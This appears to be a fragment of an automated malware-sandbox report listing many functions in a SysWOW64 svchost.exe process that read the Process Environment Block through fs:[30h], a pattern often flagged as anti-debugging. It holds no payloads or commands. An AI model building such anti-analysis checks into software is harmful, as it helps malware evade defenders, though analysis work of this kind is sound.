Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EC188 mov eax, dword ptr fs:[00000030h] 2_2_054EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4180 mov eax, dword ptr fs:[00000030h] 2_2_054D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4180 mov eax, dword ptr fs:[00000030h] 2_2_054D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A197 mov eax, dword ptr fs:[00000030h] 2_2_0542A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A197 mov eax, dword ptr fs:[00000030h] 2_2_0542A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A197 mov eax, dword ptr fs:[00000030h] 2_2_0542A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432050 mov eax, dword ptr fs:[00000030h] 2_2_05432050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6050 mov eax, dword ptr fs:[00000030h] 2_2_054B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545C073 mov eax, dword ptr fs:[00000030h] 2_2_0545C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4000 mov ecx, dword ptr fs:[00000030h] 2_2_054B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E016 mov eax, dword ptr fs:[00000030h] 2_2_0544E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A020 mov eax, dword ptr fs:[00000030h] 2_2_0542A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C020 mov eax, dword ptr fs:[00000030h] 2_2_0542C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C6030 mov eax, dword ptr fs:[00000030h] 2_2_054C6030
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B20DE mov eax, dword ptr fs:[00000030h] 2_2_054B20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0542A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054380E9 mov eax, dword ptr fs:[00000030h] 2_2_054380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B60E0 mov eax, dword ptr fs:[00000030h] 2_2_054B60E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0542C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054720F0 mov ecx, dword ptr fs:[00000030h] 2_2_054720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543208A mov eax, dword ptr fs:[00000030h] 2_2_0543208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054280A0 mov eax, dword ptr fs:[00000030h] 2_2_054280A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C80A8 mov eax, dword ptr fs:[00000030h] 2_2_054C80A8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F60B8 mov eax, dword ptr fs:[00000030h] 2_2_054F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_054F60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B2349 mov eax, dword ptr fs:[00000030h] 2_2_054B2349
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov ecx, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B035C mov eax, dword ptr fs:[00000030h] 2_2_054B035C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054FA352 mov eax, dword ptr fs:[00000030h] 2_2_054FA352
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D8350 mov ecx, dword ptr fs:[00000030h] 2_2_054D8350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550634F mov eax, dword ptr fs:[00000030h] 2_2_0550634F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D437C mov eax, dword ptr fs:[00000030h] 2_2_054D437C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A30B mov eax, dword ptr fs:[00000030h] 2_2_0546A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A30B mov eax, dword ptr fs:[00000030h] 2_2_0546A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A30B mov eax, dword ptr fs:[00000030h] 2_2_0546A30B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C310 mov ecx, dword ptr fs:[00000030h] 2_2_0542C310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05450310 mov ecx, dword ptr fs:[00000030h] 2_2_05450310
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov eax, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov ecx, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov eax, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05508324 mov eax, dword ptr fs:[00000030h] 2_2_05508324
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EC3CD mov eax, dword ptr fs:[00000030h] 2_2_054EC3CD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0543A3C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054383C0 mov eax, dword ptr fs:[00000030h] 2_2_054383C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B63C0 mov eax, dword ptr fs:[00000030h] 2_2_054B63C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov eax, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov eax, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE3DB mov eax, dword ptr fs:[00000030h] 2_2_054DE3DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D43D4 mov eax, dword ptr fs:[00000030h] 2_2_054D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D43D4 mov eax, dword ptr fs:[00000030h] 2_2_054D43D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054403E9 mov eax, dword ptr fs:[00000030h] 2_2_054403E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0544E3F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054663FF mov eax, dword ptr fs:[00000030h] 2_2_054663FF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E388 mov eax, dword ptr fs:[00000030h] 2_2_0542E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E388 mov eax, dword ptr fs:[00000030h] 2_2_0542E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E388 mov eax, dword ptr fs:[00000030h] 2_2_0542E388
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545438F mov eax, dword ptr fs:[00000030h] 2_2_0545438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545438F mov eax, dword ptr fs:[00000030h] 2_2_0545438F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428397 mov eax, dword ptr fs:[00000030h] 2_2_05428397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428397 mov eax, dword ptr fs:[00000030h] 2_2_05428397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428397 mov eax, dword ptr fs:[00000030h] 2_2_05428397
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B8243 mov eax, dword ptr fs:[00000030h] 2_2_054B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B8243 mov ecx, dword ptr fs:[00000030h] 2_2_054B8243
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0550625D mov eax, dword ptr fs:[00000030h] 2_2_0550625D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A250 mov eax, dword ptr fs:[00000030h] 2_2_0542A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436259 mov eax, dword ptr fs:[00000030h] 2_2_05436259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA250 mov eax, dword ptr fs:[00000030h] 2_2_054EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA250 mov eax, dword ptr fs:[00000030h] 2_2_054EA250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434260 mov eax, dword ptr fs:[00000030h] 2_2_05434260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434260 mov eax, dword ptr fs:[00000030h] 2_2_05434260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434260 mov eax, dword ptr fs:[00000030h] 2_2_05434260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542826B mov eax, dword ptr fs:[00000030h] 2_2_0542826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0274 mov eax, dword ptr fs:[00000030h] 2_2_054E0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542823B mov eax, dword ptr fs:[00000030h] 2_2_0542823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0543A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055062D6 mov eax, dword ptr fs:[00000030h] 2_2_055062D6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402E1 mov eax, dword ptr fs:[00000030h] 2_2_054402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402E1 mov eax, dword ptr fs:[00000030h] 2_2_054402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402E1 mov eax, dword ptr fs:[00000030h] 2_2_054402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E284 mov eax, dword ptr fs:[00000030h] 2_2_0546E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E284 mov eax, dword ptr fs:[00000030h] 2_2_0546E284
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0283 mov eax, dword ptr fs:[00000030h] 2_2_054B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0283 mov eax, dword ptr fs:[00000030h] 2_2_054B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0283 mov eax, dword ptr fs:[00000030h] 2_2_054B0283
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402A0 mov eax, dword ptr fs:[00000030h] 2_2_054402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054402A0 mov eax, dword ptr fs:[00000030h] 2_2_054402A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C62A0 mov eax, dword ptr fs:[00000030h] 2_2_054C62A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430D59 mov eax, dword ptr fs:[00000030h] 2_2_05430D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430D59 mov eax, dword ptr fs:[00000030h] 2_2_05430D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430D59 mov eax, dword ptr fs:[00000030h] 2_2_05430D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438D59 mov eax, dword ptr fs:[00000030h] 2_2_05438D59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C8D6B mov eax, dword ptr fs:[00000030h] 2_2_054C8D6B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 mov eax, dword ptr fs:[00000030h] 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 mov eax, dword ptr fs:[00000030h] 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544AD00 mov eax, dword ptr fs:[00000030h] 2_2_0544AD00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426D10 mov eax, dword ptr fs:[00000030h] 2_2_05426D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426D10 mov eax, dword ptr fs:[00000030h] 2_2_05426D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426D10 mov eax, dword ptr fs:[00000030h] 2_2_05426D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464D1D mov eax, dword ptr fs:[00000030h] 2_2_05464D1D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E8D10 mov eax, dword ptr fs:[00000030h] 2_2_054E8D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E8D10 mov eax, dword ptr fs:[00000030h] 2_2_054E8D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504D30 mov eax, dword ptr fs:[00000030h] 2_2_05504D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B8D20 mov eax, dword ptr fs:[00000030h] 2_2_054B8D20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545EDD3 mov eax, dword ptr fs:[00000030h] 2_2_0545EDD3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545EDD3 mov eax, dword ptr fs:[00000030h] 2_2_0545EDD3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4DD7 mov eax, dword ptr fs:[00000030h] 2_2_054B4DD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4DD7 mov eax, dword ptr fs:[00000030h] 2_2_054B4DD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543ADE0 mov eax, dword ptr fs:[00000030h] 2_2_0543ADE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05450DE1 mov eax, dword ptr fs:[00000030h] 2_2_05450DE1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CDEA mov eax, dword ptr fs:[00000030h] 2_2_0542CDEA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CDEA mov eax, dword ptr fs:[00000030h] 2_2_0542CDEA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05426DF6 mov eax, dword ptr fs:[00000030h] 2_2_05426DF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545CDF0 mov eax, dword ptr fs:[00000030h] 2_2_0545CDF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545CDF0 mov ecx, dword ptr fs:[00000030h] 2_2_0545CDF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D0DF0 mov eax, dword ptr fs:[00000030h] 2_2_054D0DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D0DF0 mov eax, dword ptr fs:[00000030h] 2_2_054D0DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F8DAE mov eax, dword ptr fs:[00000030h] 2_2_054F8DAE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F8DAE mov eax, dword ptr fs:[00000030h] 2_2_054F8DAE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05466DA0 mov eax, dword ptr fs:[00000030h] 2_2_05466DA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CDB1 mov ecx, dword ptr fs:[00000030h] 2_2_0546CDB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CDB1 mov eax, dword ptr fs:[00000030h] 2_2_0546CDB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CDB1 mov eax, dword ptr fs:[00000030h] 2_2_0546CDB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458DBF mov eax, dword ptr fs:[00000030h] 2_2_05458DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458DBF mov eax, dword ptr fs:[00000030h] 2_2_05458DBF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504DAD mov eax, dword ptr fs:[00000030h] 2_2_05504DAD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543AC50 mov eax, dword ptr fs:[00000030h] 2_2_0543AC50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436C50 mov eax, dword ptr fs:[00000030h] 2_2_05436C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436C50 mov eax, dword ptr fs:[00000030h] 2_2_05436C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436C50 mov eax, dword ptr fs:[00000030h] 2_2_05436C50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464C59 mov eax, dword ptr fs:[00000030h] 2_2_05464C59
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440C00 mov eax, dword ptr fs:[00000030h] 2_2_05440C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4C0F mov eax, dword ptr fs:[00000030h] 2_2_054B4C0F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CC00 mov eax, dword ptr fs:[00000030h] 2_2_0546CC00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EC20 mov eax, dword ptr fs:[00000030h] 2_2_0542EC20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054CCC20 mov eax, dword ptr fs:[00000030h] 2_2_054CCC20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054CCC20 mov eax, dword ptr fs:[00000030h] 2_2_054CCC20
